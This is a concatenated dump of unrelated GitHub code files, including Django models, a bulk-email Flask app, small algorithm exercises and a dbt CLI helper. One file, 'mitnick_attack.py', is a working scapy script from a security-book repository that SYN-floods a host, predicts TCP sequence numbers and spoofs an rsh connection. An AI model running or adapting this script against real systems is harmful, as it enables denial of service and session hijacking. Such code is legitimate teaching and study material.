tables.TemplateColumn(T1, verbose_name=\"Название проекта\", )\n\n class Meta:\n model = Project\n fields = ('id', 'title', 'organization__short_name',)\n attrs = {\"class\": \"table table-sm table-responsive\"}\n\n\nclass ScoreSheetTable(tables.Table):\n T1 = '''\n {{record.project.title}}\n '''\n project__title = tables.TemplateColumn(T1, verbose_name=\"Проект\", orderable=False)\n\n T_ACTION = '''\n {% if record.status == record.NEW and record.contest.status == record.contest.ON_EXAM%}\n    \n \n {% else %}\n \n {% endif %}\n '''\n action = tables.TemplateColumn(T_ACTION, verbose_name=\"\", orderable=False)\n\n score_sum = tables.Column(verbose_name=\"Рейтинг\", orderable=False)\n score_total_sum = tables.Column(verbose_name=\"Рейтинг k\", orderable=False)\n class 
Meta:\n model = ScoreSheet\n fields = ('contest', 'status', 'project__title', 'score_sum', 'score_total_sum', 'created_on')\n attrs = {\"class\": \"table table-sm table-responsive\"}\n","repo_name":"justbegan/grants_mun_obr","sub_path":"src/apps/expert/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32333510862","text":"r = 1\r\nnum = 0\r\nfor i in range(int(input())):\r\n a, b, c = map(int, input().split())\r\n r = r // a * b\r\n if c == 1:\r\n if num == 1:\r\n num = 0\r\n else:\r\n num = 1\r\n\r\nprint(num, r)","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/10834.py","file_name":"10834.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8227670288","text":"\"\"\"\nScript to repost youtube videos on vk.com. DRAFT. Do not take it seriously.\n\nNOTES:\nDoes not look further than 50 most recently uploaded videos (1 request limit).\nNo DB. Stores last reposted video id in file `last_id`.\nNo proper error handling/logging. \nDoes not guarantee repost to be atomic operation. \nYoutube API costs: 6 units / run (2 requests).\n\"\"\"\nfrom config import YT_API_KEY, YT_CHANNEL_ID, VK_API_KEY, VK_OWNER_ID, FILE_LAST_ID\n\nimport logging\nimport requests\nfrom itertools import takewhile\nfrom pprint import pprint as pp\n\n\nyt_api_baseurl = 'https://www.googleapis.com/youtube/v3/'\nvk_api_baseurl = 'https://api.vk.com/method/'\nlogger = logging.getLogger('yt2vk')\n\n\nclass RequestError(Exception):\n pass\n\n\ndef _yt_api_request(resource, params=None):\n if params is None:\n params = {}\n params['key'] = YT_API_KEY\n url = yt_api_baseurl + resource\n response = requests.get(url, params).json()\n if 'error' in response:\n raise RequestError(url, response)\n return response\n\ndef yt_new_videos(last_id=None):\n \"\"\"\n Returns list of videos which should be reposted.\n `last_id` is video id of last reposted video.\n \"\"\"\n response = _yt_api_request('channels', params={\n 'part': 'contentDetails',\n 'id': YT_CHANNEL_ID,\n })\n playlist_id = response['items'][0]['contentDetails']['relatedPlaylists']['uploads']\n \n response = _yt_api_request('playlistItems', params={\n 'part': 'snippet',\n 'playlistId': playlist_id,\n 'maxResults': 50,\n })\n videos = list(takewhile(\n lambda item: item['snippet']['resourceId']['videoId'] != last_id,\n response['items']))\n videos.reverse()\n return videos\n\ndef _vk_api_request(method_name, params=None):\n if params is None:\n params = {}\n params['access_token'] = VK_API_KEY\n params['v'] = '5.53'\n url = vk_api_baseurl + method_name\n response = requests.post(url, data=params)\n json_data = response.json()\n if 'error' in json_data:\n raise RequestError(url, json_data)\n return json_data['response']\n\ndef _vk_follow_upload_url(upload_url, yt_video_id):\n # Do not upload again if video is already uploaded. \n response = _vk_api_request('video.get', params={\n 'owner_id': VK_OWNER_ID,\n 'count': 200,\n })\n for item in response['items']:\n if yt_video_id in item['player']:\n logging.warn('Video \"%s\" was already uploaded. 
New video upload is cancelled.', yt_video_id)\n return item['id']\n\n response = requests.get(upload_url).json()\n if 'error_code' in response:\n raise RequestError(upload_url, response)\n\ndef vk_post(yt_video):\n snippet = yt_video['snippet']\n title = snippet['title']\n yt_video_id = snippet['resourceId']['videoId']\n yt_video_url = 'https://youtube.com/watch?v=' + yt_video_id\n description = snippet.get('description', '').strip()\n #message = title + '\\n' + description + '\\n' + yt_video_url\n message = title.upper()\n if description:\n message += '\\n\\n' + description\n message += '\\n\\n(дополнительный комментарий - в видео)'\n\n response = _vk_api_request('video.save', params={\n 'link': yt_video_url,\n #'wallpost': 1,\n 'group_id': VK_OWNER_ID.lstrip('-'),\n })\n old_vid = _vk_follow_upload_url(response['upload_url'], yt_video_id)\n if old_vid is not None:\n # Video has been uploaded already. Use it.\n vk_video_id = old_vid \n else:\n vk_video_id = response['video_id']\n \n attachments = 'video{}_{}'.format(response['owner_id'], vk_video_id)\n response = _vk_api_request('wall.post', params={\n 'owner_id': VK_OWNER_ID,\n 'from_group': 1,\n 'guid': yt_video_id,\n 'message': message,\n 'attachments': attachments,\n })\n\ndef _set_last_id(last_id):\n with open(FILE_LAST_ID, 'w') as f:\n f.write(last_id)\n\ndef _get_last_id():\n with open(FILE_LAST_ID, 'a+') as f:\n f.seek(0)\n last_id = f.read().rstrip()\n return last_id or None\n \ndef main():\n last_id = _get_last_id()\n\n # Temporary hotfix.\n # TODO: remove.\n videos = yt_new_videos(last_id)\n if len(videos) > 20:\n raise Exception(\"BS\")\n\n for yt_video in videos:\n yt_video_id = yt_video['snippet']['resourceId']['videoId']\n logger.info(\"Processing: last_id = %s, vid = %s, title = %s\",\n last_id, yt_video_id, yt_video['snippet']['title'])\n\n vk_post(yt_video)\n \n _set_last_id(yt_video_id)\n\nif __name__ == '__main__':\n try:\n main()\n except RequestError as e:\n logger.error(repr(e))\n raise\n \n","repo_name":"fortunto2/yt2vk","sub_path":"yt2vk.py","file_name":"yt2vk.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19951107241","text":"import argparse\nfrom scapy.all import send, sr1\nfrom scapy.layers.inet import IP, TCP\n\n\ndef syn_flood(src, tgt):\n for sport in range(1024, 65535):\n ip_layer = IP(src=src, dst=tgt)\n tcp_layer = TCP(sport=sport, dport=513)\n pkt = ip_layer / tcp_layer\n send(pkt)\n\n\ndef cal_TSN(tgt):\n seq_num = 0\n pre_num = 0\n diff_seq = 0\n\n for x in range(1, 5):\n if seq_num:  # remember the previous sequence number once we have one\n pre_num = seq_num\n pkt = IP(dst=tgt) / TCP()\n ans = sr1(pkt, verbose=0)\n seq_num = ans.getlayer(TCP).seq\n diff_seq = seq_num - pre_num\n print(f'[+] TCP Seq Difference: {str(diff_seq)}')\n\n return seq_num + diff_seq\n\n\ndef spoof_conn(src, tgt, ack):\n ip_layer = IP(src=src, dst=tgt)\n tcp_layer = TCP(sport=513, dport=514)\n syn_pkt = ip_layer / tcp_layer\n send(syn_pkt)\n\n ip_layer = IP(src=src, dst=tgt)\n tcp_layer = TCP(sport=513, dport=514, ack=ack)\n ack_pkt = ip_layer / tcp_layer\n send(ack_pkt)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n usage='python3 mitnick_attack.py SRC_SYN SRC_SPOOFED TARGET_ADDRESS')\n parser.add_argument('src_syn', type=str, metavar='SRC_SYN',\n help='specify the source for the SYN flood attack')\n parser.add_argument('src_spoof', type=str, metavar='SRC_SPOOFED',\n help='specify the source for the spoofed connection')\n parser.add_argument('target', 
type=str, metavar='TARGET_ADDRESS',\n help='specify the target address of the attack')\n args = parser.parse_args()\n\n _syn_spoof = args.src_syn\n _src_spoof = args.src_spoof\n _target = args.target\n\n print('[+] Starting SYN Flood to suppress the remote server.')\n syn_flood(_syn_spoof, _src_spoof)\n\n print('[+] Calculating correct TCP Sequence Number.')\n _seq_num = cal_TSN(_target) + 1\n\n print('[+] Spoofing Connection.')\n spoof_conn(_src_spoof, _target, _seq_num)\n\n print('[+] Done.')\n","repo_name":"EONRaider/violent-python3","sub_path":"chapter04/mitnick_attack.py","file_name":"mitnick_attack.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":922,"dataset":"github-code","pt":"53"} +{"seq_id":"74197192809","text":"import smtplib\r\nimport ssl\r\nimport mimetypes\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.image import MIMEImage\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nimport six\r\nimport os.path\r\nimport tkinter.scrolledtext as scrolledtext\r\nfrom pyfiglet import figlet_format\r\nfrom email.mime.application import MIMEApplication\r\nfrom tkinter import filedialog\r\nimport flask\r\nfrom flask_cors import CORS\r\nimport json\r\nfrom flask.json import jsonify\r\nfrom flask import request\r\nfrom werkzeug.utils import secure_filename\r\ntry:\r\n from termcolor import colored\r\nexcept ImportError:\r\n colored = None\r\n\r\nlogin_details = dict()\r\nto_emails = np.zeros(3)\r\ndetails = dict()\r\n\r\n\r\nstyletagsfinal = \"\"\"\"\"\"\r\n\r\nbodytagsfinal = \"\"\"\r\n
<!-- NOTE: the original tags of this template were stripped during extraction; the markup below is a reconstruction. Only the text, the alt values and the line breaks are original; tag names and image sources are placeholders. -->\r\n
    <img src=\"PLACEHOLDER_BANNER\" alt=\"Document\">\r\n\r\n
    <div>\r\n
        <img src=\"PLACEHOLDER_IMAGE_1\" alt=\"Image\">\r\n        <img src=\"PLACEHOLDER_IMAGE_2\" alt=\"Image\">\r\n
    </div>\r\n\r\n
    <div>\r\n
    Dear Manager<br>\r\n    Greeting from Start@KMV,\r\n    The Placement Cell Of Keshav Mahavidyalaya, University of Delhi<br><br>\r\n
    We would like to inform you about the commencement\r\n    of the Placement Season for the session 2020-21.<br><br>The\r\n    Students of Keshav Mahavidyalaya are a diverse group of\r\n    exceptional individuals interested in a variety of\r\n    opportunities. Our students have been placed in\r\n    prestigious companies like AT Kearney, EY, TresVista,\r\n    Deloitte, ZS, Infosys, S&P Global & Gartner among others.<br><br>\r\n
    We wish to set new records this season and thus invite\r\n    your esteemed organization for placement and internship\r\n    opportunities. In the light of the current situation, we are\r\n    also open to Virtual hiring drives.<br>\r\n    PFA : Placement Brochure<br><br>\r\n
    For further information, contact-<br>\r\n    Pranjal Kukreja - 9711376316<br>\r\n    Riya Himmatramka - 9289997915<br>\r\n
    Thank You<br>\r\n    Regards<br>\r\n    Start@KMV<br>\r\n    The Placement Cell<br>\r\n    Keshav Mahavidyalaya<br>\r\n    University of Delhi<br>\r\n
    </div>\r\n
\r\n\r\n\r\n\"\"\"\r\n\r\n\r\ndef emails_to_be_sent(snum, enum, mailaddr, sheetlink, subject):\r\n global login_details\r\n try:\r\n database = pd.read_csv(sheetlink)\r\n try:\r\n snum = int(snum)\r\n enum = int(enum)\r\n database = database.iloc[snum-1:enum, ::]\r\n # starting: ending , 169, 200\r\n database[\"Name\"] = database[\"Name\"].fillna(\r\n \"Sir/Ma'am\") # \"\" --> hiring manager\r\n details = dict(zip(database[\"Email\"], database[\"Name\"]))\r\n to_emails = database[\"Email\"].values\r\n login_details = {'smtp_server': 'smtp.gmail.com', 'smtp_protocol': 'tls',\r\n 'example_no': '3', 'from_email': mailaddr, 'to_email': to_emails, 'subject': subject}\r\n\r\n except:\r\n return False\r\n except:\r\n return False\r\n return (login_details, details)\r\n\r\n\r\ndef get_html_message(from_email, to_email, subject, detailinfo, style, body):\r\n msg = MIMEMultipart('alternative')\r\n msg['Subject'] = subject\r\n msg['From'] = from_email\r\n msg['To'] = to_email\r\n # Plain-text version of content\r\n plain_text = \"\"\"\\\r\n\r\n Greetings from Start@KMV, The Placement Cell of Keshav\r\n Mahavidyalaya, University of Delhi.\r\n\r\n To continue on the path of providing novel opportunities to the\r\n students, we are organizing the second edition of the Virtual\r\n Internship Fair on February 28, 2021.\r\n\r\n Last year’s fair was an extreme success with 30+ esteemed\r\n organizations offering a plethora of opportunities across diverse fields\r\n and witnessed more than a combined 6000+ student applications.\r\n\r\n The aim of the event is to bring employers from a variety of industries\r\n — Start-ups, MNCs and Social Organisations — hiring for various\r\n roles of internship and apprenticeship positions. In the past,\r\n companies such as Sharekhan, Zomato Feeding India, Sanguine\r\n Capital, Vivo, The MoneyRoller, Grant Thornton, Deloitte, NITI Aayog,\r\n Wipro and many more have participated and selected students for\r\n internships.\r\n\r\n We wish to invite your esteemed organisation for the same and look\r\n forward to a mutually beneficial relationship with your organisation.\r\n\r\n PFA: Brochure\r\n\r\n For further information, contact -\r\n Pranjal Kukreja - 9711376316\r\n Riya Himmatramka - 9289997915\r\n\r\n Thank You\r\n Regards\r\n Start@KMV\r\n The Placement Cell\r\n Keshav Mahavidyalaya\r\n University of Delhi\r\n \"\"\"\r\n # html version of content\r\n html_content = \"\"\"\\\r\n \r\n \r\n \r\n styletags\r\n \r\n \r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n Document\r\n \r\n bodytags\r\n \r\n\r\n \"\"\"\r\n html_content = html_content.replace(\"styletags\", style, 1)\r\n html_content = html_content.replace(\"bodytags\", body, 1)\r\n html_content = html_content.replace(\"Manager\", detailinfo[to_email])\r\n text_part = MIMEText(plain_text, 'plain')\r\n html_part = MIMEText(html_content, 'html')\r\n msg.add_header('Content-Type', 'text/html')\r\n msg.attach(text_part)\r\n msg.attach(html_part)\r\n return msg\r\n\r\n\r\ndef get_attachment_message(from_email, to_email, subject, detailinfo, style, body, filename):\r\n msg = get_html_message(from_email, to_email, subject,\r\n detailinfo, style, body)\r\n \r\n file_path = filename\r\n ctype, encoding = mimetypes.guess_type(file_path)\r\n maintype, subtype = ctype.split('/', 1)\r\n pdf = MIMEApplication(open(file_path, 'rb').read())\r\n pdf.add_header('Content-Disposition', 'attachment', filename=os.path.splitext(\r\n filename)[0].split(\"/\")[-1] + os.path.splitext(filename)[1])\r\n msg.attach(pdf)\r\n return msg\r\n\r\n\r\ndef 
send_email(email_info, detailinfo, style, body, filename, server):\r\n    example_no = email_info.get('example_no', '')\r\n    from_email = email_info.get('from_email', '')\r\n    to_email = email_info.get('to_email', '')\r\n    subject = email_info.get('subject', '')\r\n\r\n    try:\r\n        if filename == '':\r\n            for x in to_email:\r\n                msg = get_html_message(\r\n                    from_email, x, subject, detailinfo, style, body)\r\n                server.send_message(msg)\r\n            return True\r\n\r\n        else:\r\n            for x in to_email:\r\n                msg = get_attachment_message(\r\n                    from_email, x, subject, detailinfo, style, body, filename)\r\n                server.send_message(msg)\r\n            return True\r\n    except Exception as e:\r\n        # surface a failed send as an error response instead of an unhandled 500\r\n        print(e)\r\n        return False\r\n    finally:\r\n        server.quit()\r\n\r\n\r\ndef sendMails(email, password, subject, link, eno, sno, filename):\r\n    smtp_server = 'smtp.gmail.com'\r\n    protocol = 'tls'\r\n    context = ssl.create_default_context()\r\n    try:\r\n        if protocol == 'ssl':\r\n            port = 465\r\n            server = smtplib.SMTP_SSL(smtp_server, port, context=context)\r\n            server.login(email, password)\r\n        elif protocol == 'tls':\r\n            port = 587\r\n            server = smtplib.SMTP(smtp_server, port)\r\n            server.starttls(context=context)\r\n            server.login(email, password)\r\n    except Exception as e:\r\n        print(e)\r\n        return \"email\"\r\n    x = main(sno, eno, email, password, link, subject, styletagsfinal, bodytagsfinal, filename, server)\r\n    return x\r\n\r\n\r\ndef main(start, end, mailaddr, passwd, sheetlink, subject, style, body, filename, server):\r\n    loginreturn = emails_to_be_sent(start, end, mailaddr, sheetlink, subject)\r\n    if loginreturn:\r\n        email_info, detailinfo = loginreturn\r\n        val = send_email(email_info, detailinfo, style, body, filename, server)\r\n        if val:\r\n            return True\r\n        else:\r\n            return \"error\"\r\n    else:\r\n        return \"link\"\r\n\r\n\r\n\r\n\r\napp = flask.Flask(__name__)\r\nuploads_dir = os.path.join(app.instance_path, 'uploads')\r\nos.makedirs(uploads_dir, exist_ok=True)\r\nCORS(app)\r\n@app.route('/api', methods=['GET', 'POST'])\r\ndef email():\r\n    if flask.request.method == 'POST':\r\n        print(\"Received a req\")\r\n        email = request.form.get('email')\r\n        password = request.form.get('password')\r\n        subject = request.form.get('subject')\r\n        link = request.form.get('link')\r\n        eno = request.form.get('eno')\r\n        sno = request.form.get('sno')\r\n        file = request.files['file']\r\n        filename = secure_filename(file.filename)\r\n        file.save(os.path.join(uploads_dir, filename))\r\n        x = sendMails(email, password, subject, link, eno, sno, os.path.join(uploads_dir, filename))\r\n        if x == \"email\":\r\n            return \"cred\"\r\n        elif x == \"link\":\r\n            return \"link\"\r\n        elif x == \"error\":\r\n            return \"error\"\r\n        else:\r\n            return \"Done\"\r\n\r\n\r\napp.run(host=\"127.0.0.1\", port=5000, debug=True)\r\n\r\n\r\n\r\n\r\n","repo_name":"manav-1/Bulk-Emailing-React-App","sub_path":"emailserver.py","file_name":"emailserver.py","file_ext":"py","file_size_in_byte":11554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
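The send path in emailserver.py reduces to one reusable pattern: build a multipart/alternative message, open a single SMTP connection, upgrade it with STARTTLS, log in, and send. A minimal sketch of that pattern follows; the host, credentials, and addresses are placeholder assumptions, not values from the app.

import smtplib
import ssl
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def send_simple_mail(sender, password, recipient, subject, plain, html):
    # Multipart/alternative: clients render the last part they support,
    # so the plain-text fallback is attached before the HTML part.
    msg = MIMEMultipart('alternative')
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = recipient
    msg.attach(MIMEText(plain, 'plain'))
    msg.attach(MIMEText(html, 'html'))

    context = ssl.create_default_context()
    with smtplib.SMTP('smtp.gmail.com', 587) as server:  # placeholder host/port
        server.starttls(context=context)
        server.login(sender, password)
        server.send_message(msg)

# Placeholder values, for illustration only:
# send_simple_mail('me@example.com', 'app-password', 'you@example.com',
#                  'Hello', 'plain body', '<p>html body</p>')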
+{"seq_id":"7255671069","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 6 20:42:53 2023\n\n@author: anthony\n\"\"\"\nimport numpy as np\n\n# function to know if we can place a queen at (x, y)\ndef issafe(x,y):\n    global board\n    board_size = len(board)\n    for i in range(board_size):\n        # check if a queen is already on row x\n        if board[x][i] == 1:\n            return False\n        # check if a queen is already on column y\n        if board[i][y] == 1:\n            return False\n    # check if queen on top-left diagonal\n    i, j = x, y\n    while i >= 0 and j >= 0:\n        if board[i][j] == 1:\n            return False\n        i -= 1\n        j -= 1\n    # check if queen on top-right diagonal\n    i, j = x, y\n    while i >= 0 and j < board_size:\n        if board[i][j] == 1:\n            return False\n        i -= 1\n        j += 1\n    # check if queen on bottom-left diagonal\n    i, j = x, y\n    while i < board_size and j >= 0:\n        if board[i][j] == 1:\n            return False\n        i += 1\n        j -= 1\n    # check if queen on bottom-right diagonal\n    i, j = x, y\n    while i < board_size and j < board_size:\n        if board[i][j] == 1:\n            return False\n        i += 1\n        j += 1\n\n    return True\n\n# find all combinations of possible solutions\ndef solve_all_solutions(x, y):\n    global board, nb_solutions\n    board_size = len(board)\n    for i in range(x, board_size):\n        for j in range(board_size):\n            if issafe(i,j):\n                board[i][j] = 1\n                solve_all_solutions(i+1,0)\n                board[i][j] = 0\n        return\n    # reached only when a queen was placed in every row\n    nb_solutions += 1\n\n# find one solution\ndef solve(x, y):\n    global board, nb_solutions\n    board_size = len(board)\n    for i in range(x, board_size):\n        for j in range(board_size):\n            if issafe(i,j):\n                board[i][j] = 1\n                if solve(i+1,0):\n                    return True\n                board[i][j] = 0\n        return False\n    # all queens are placed: print the solved board\n    print(board)\n    return True\n\n\n\n# define size of board\nn = int(input(\"Which size of board ? \"))\n\nboard = np.zeros((n,n))\n\nnb_solutions = 0\nsolve_all_solutions(0, 0)\nprint(\"There are\", nb_solutions, \"solutions\")\n\nsolve(0,0)\n","repo_name":"anthony-ait/Misc_python","sub_path":"queen_problem.py","file_name":"queen_problem.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
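The board-rescanning issafe() above costs O(n) per probe. The same backtracking idea is often written with the attacked columns and diagonals kept in sets, making each safety test O(1). A compact sketch of that variant (not the author's code; it only counts solutions):

def count_solutions(n):
    # cells on the same "/" diagonal share row+col; on the same "\" diagonal, row-col
    cols, diag1, diag2 = set(), set(), set()

    def place(row):
        if row == n:
            return 1  # every row holds a queen
        total = 0
        for col in range(n):
            if col in cols or (row - col) in diag1 or (row + col) in diag2:
                continue
            cols.add(col); diag1.add(row - col); diag2.add(row + col)
            total += place(row + 1)
            cols.remove(col); diag1.remove(row - col); diag2.remove(row + col)
        return total

    return place(0)

assert count_solutions(8) == 92  # the classic 8-queens count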
+{"seq_id":"442909883","text":"import xlrd\r\n\r\n\r\nclass InitPage:\r\n    success_data = []\r\n    wb = xlrd.open_workbook(filename='HKR.xlsx', encoding_override=True)\r\n    st = wb.sheet_by_index(0)\r\n    rows = st.nrows  # number of rows in the sheet\r\n    row = st.row_values(0)[:3]  # the first three column headers\r\n    for i in range(1, rows):\r\n        row1 = (st.row_values(i)[:3])  # first three values of each data row\r\n        b = (dict(zip(row, row1)))  # zip headers and values into a dict\r\n        success_data.append(b)  # collect the row dicts\r\n\r\n    error_data = []\r\n    wb = xlrd.open_workbook(filename='HKR.xlsx', encoding_override=True)\r\n    st = wb.sheet_by_index(1)\r\n    rows = st.nrows  # number of rows in the sheet\r\n    row = st.row_values(0)[:3]\r\n    for x in range(1, rows):\r\n        row2 = (st.row_values(x)[:3])\r\n        b = (dict(zip(row, row2)))\r\n        error_data.append(b)\r\n","repo_name":"liguopu/-","sub_path":"day03【自动化框架】/autoweb03/InitPage.py","file_name":"InitPage.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15071611335","text":"from clases import *\n\n\ndef main():\n    # Create a profession\n    ing = Profesion(\"Ingeniero Civil Industrial\", 1000)\n\n    # Create a user\n    usuario1 = Usuario(\"José Miguel Mercado Gutiérrez\", ing, 26)\n\n    # Print the user's balance\n\n    print(f\"El saldo del usuario es: ${usuario1.billetera.saldo}\")\n\n    # Add another $1,000 pesos\n    usuario1.billetera.ingresar_dinero(1000)\n\n    print(f\"El saldo del usuario es: ${usuario1.billetera.saldo}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Ontos-2021/CashFlow_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7584604334","text":"from django.db import models\n\nfrom stdimage.models import StdImageField\n\n\nclass Base(models.Model):\n    criado = models.DateField('data de Criação', auto_now_add=True)\n    modificado = models.DateField('data de Atualização', auto_now=True)\n    ativo = models.BooleanField('ativo?', default=True)\n\n    class Meta:\n        abstract = True\n\n\nclass Vinho(Base):\n    nome = models.CharField('Nome do Vinho',max_length=100)\n    cor = models.CharField('Cor',max_length=20,default='T', choices=(('T','Tinto'), ('R', 'Rose'), ('B', 'branco')))\n    uva = models.CharField('Uva',max_length=20,default='CS',\n                           choices=(('CS', 'Cabernet Sauvignon'),\n                                    ('CF', 'Cabernet Franc'),\n                                    ('PN', 'Pinot Noir'),\n                                    ('ME', 'Merlot'),\n                                    ('MA', 'Malbec'),\n                                    ('RS', 'Riesling'),\n                                    ('TN', 'Tannat'),\n                                    ('CH', 'Chardonnay')))\n    acucar = models.CharField('Teor de Açucar',max_length=20, default='SC',\n                              choices=(('SC', 'Seco'),\n                                       ('DS', 'Demi Sec'),\n                                       ('SU', 'Suave'),\n                                       ('DO', 'Doce'),\n                                       ('NA', 'Nature'),\n                                       ('EB', 'Extra Brut'),\n                                       ('BR', 'Brut')))\n    safra = models.IntegerField('Safra')\n    nacionalidade = models.CharField('Nacionalidade',max_length=20, default='BR',\n                                     choices=(('BR', 'Brasil'),\n                                              ('AR', 'Argentina'),\n                                              ('UR', 'Uruguai'),\n                                              ('CH', 'Chile'),\n                                              ('PO', 'Portugal'),\n                                              ('ES', 'Espanha'),\n                                              ('FR', 'França'),\n                                              ('IN', 'Inglaterra'),\n                                              ('IT', 'Itália'),\n                                              ('AL', 'Alemanha'),\n                                              ('SU', 'Suiça'),\n                                              ('EU', 'Estados Unidos'),\n                                              ('AF', 'África do Sul'),\n                                              ('AU', 'Austrália')))\n    vinicula = models.CharField('Vinícula',max_length=20)\n    alcool = models.DecimalField('Teor de Álcool', max_digits=3, decimal_places=1)\n    volume = models.IntegerField('Volume')\n    reserva = models.CharField('Reserva',max_length=20, default='RE',\n                               choices=(('RE', 'Reserva'),\n                                        ('NR', 'Não Reservado')))\n    tonalidade = StdImageField('Tonalidade', upload_to='tonalidade', variations={'thumb': (124,124)})\n    img_rotulo = StdImageField('Rótulo', upload_to='produto', variations={'thumb': (124,124)})\n    img_garrafa = StdImageField('Garrafa', upload_to='garrafa', variations={'thumb': (256,256)})\n    descricao = models.TextField('Descrição',blank=True, null=True)\n    preco = models.DecimalField('Preço', max_digits=8, decimal_places=2)\n    promocao = models.DecimalField('Promoção', max_digits=8, decimal_places=2)\n    estoque = models.IntegerField('Estoque')\n    avaliacao = models.IntegerField('Avaliação')\n    num_avaliacoes = models.IntegerField('Número de avaliações')\n    destaque = 
models.BooleanField('Destaque', default=False)\n\n class Meta:\n db_table = 'vinho'\n\n def __str__(self):\n return self.nome\n\n\n","repo_name":"eng-olavo/wine","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9892357917","text":"import json\nimport os\nimport subprocess\nfrom typing import Any, Iterator, List, Mapping, NamedTuple, Optional, Sequence, Union\n\nimport dagster._check as check\nfrom dagster._core.utils import coerce_valid_log_level\n\nfrom ..errors import (\n DagsterDbtCliFatalRuntimeError,\n DagsterDbtCliHandledRuntimeError,\n DagsterDbtCliOutputsNotFoundError,\n)\nfrom .types import DbtCliOutput\n\nDEFAULT_DBT_TARGET_PATH = \"target\"\n\nDBT_RUN_RESULTS_COMMANDS = [\"run\", \"test\", \"seed\", \"snapshot\", \"docs generate\", \"build\"]\n\n\nclass DbtCliEvent(NamedTuple):\n \"\"\"Helper class to encapsulate parsed information from an active dbt CLI process.\"\"\"\n\n line: Optional[str]\n message: Optional[str]\n parsed_json_line: Optional[Mapping[str, Any]]\n log_level: Optional[int]\n\n @classmethod\n def from_line(cls, line: str, json_log_format: bool) -> \"DbtCliEvent\":\n message = line\n parsed_json_line = None\n log_level = \"info\"\n\n # parse attributes out of json fields\n if json_log_format:\n try:\n parsed_json_line = json.loads(line)\n except json.JSONDecodeError:\n pass\n else:\n # in rare cases, the loaded json line may be a string rather than a dictionary\n if isinstance(parsed_json_line, dict):\n message = parsed_json_line.get(\n # Attempt to get the message from the dbt-core==1.3.* format\n \"msg\",\n # Otherwise, try to get the message from the dbt-core==1.4.* format\n parsed_json_line.get(\"info\", {}).get(\n \"msg\",\n # If all else fails, default to the whole line\n line,\n ),\n )\n log_level = parsed_json_line.get(\n # Attempt to get the log level from the dbt-core==1.3.* format\n \"level\",\n # Otherwise, try to get the message from the dbt-core==1.4.* format\n parsed_json_line.get(\"info\", {}).get(\n \"level\",\n # If all else fails, default to the `debug` level\n \"debug\",\n ),\n )\n # attempt to parse log level out of raw line\n elif \"Done.\" not in line:\n # attempt to parse a log level out of the line\n if \"ERROR\" in line:\n log_level = \"error\"\n elif \"WARN\" in line:\n log_level = \"warn\"\n\n return DbtCliEvent(\n line=line,\n message=message,\n parsed_json_line=parsed_json_line,\n log_level=coerce_valid_log_level(log_level),\n )\n\n\ndef _create_command_list(\n executable: str,\n warn_error: bool,\n json_log_format: bool,\n command: str,\n flags_dict: Mapping[str, Any],\n debug: bool,\n) -> Sequence[str]:\n prefix = [executable]\n if warn_error:\n prefix += [\"--warn-error\"]\n if json_log_format:\n prefix += [\"--no-use-colors\", \"--log-format\", \"json\"]\n if debug:\n prefix += [\"--debug\"]\n\n full_command = [*command.split(\" \"), *build_command_args_from_flags(flags_dict)]\n\n return prefix + full_command\n\n\ndef build_command_args_from_flags(flags_dict: Mapping[str, Any]) -> Sequence[str]:\n result = []\n for flag, value in flags_dict.items():\n if not value:\n continue\n\n result.append(f\"--{flag}\")\n\n if isinstance(value, bool):\n pass\n elif isinstance(value, list):\n check.list_param(value, f\"config.{flag}\", of_type=str)\n result += value\n elif isinstance(value, dict):\n result.append(json.dumps(value))\n else:\n result.append(str(value))\n\n return 
result\n\n\ndef _core_execute_cli(\n command_list: Sequence[str],\n ignore_handled_error: bool,\n json_log_format: bool,\n project_dir: str,\n) -> Iterator[Union[DbtCliEvent, int]]:\n \"\"\"Runs a dbt command in a subprocess and yields parsed output line by line.\"\"\"\n # Execute the dbt CLI command in a subprocess.\n messages: List[str] = []\n\n # run dbt with unbuffered output\n passenv = os.environ.copy()\n passenv[\"PYTHONUNBUFFERED\"] = \"1\"\n process = subprocess.Popen(\n command_list,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n env=passenv,\n cwd=project_dir if os.path.exists(project_dir) else None,\n )\n for raw_line in process.stdout or []:\n line = raw_line.decode().strip()\n\n cli_event = DbtCliEvent.from_line(line, json_log_format)\n\n if cli_event.message is not None:\n messages.append(cli_event.message)\n\n # yield the parsed values\n yield cli_event\n\n process.wait()\n return_code = process.returncode\n\n if return_code == 2:\n raise DagsterDbtCliFatalRuntimeError(messages=messages)\n\n if return_code == 1 and not ignore_handled_error:\n raise DagsterDbtCliHandledRuntimeError(messages=messages)\n\n yield return_code\n\n\ndef execute_cli_stream(\n executable: str,\n command: str,\n flags_dict: 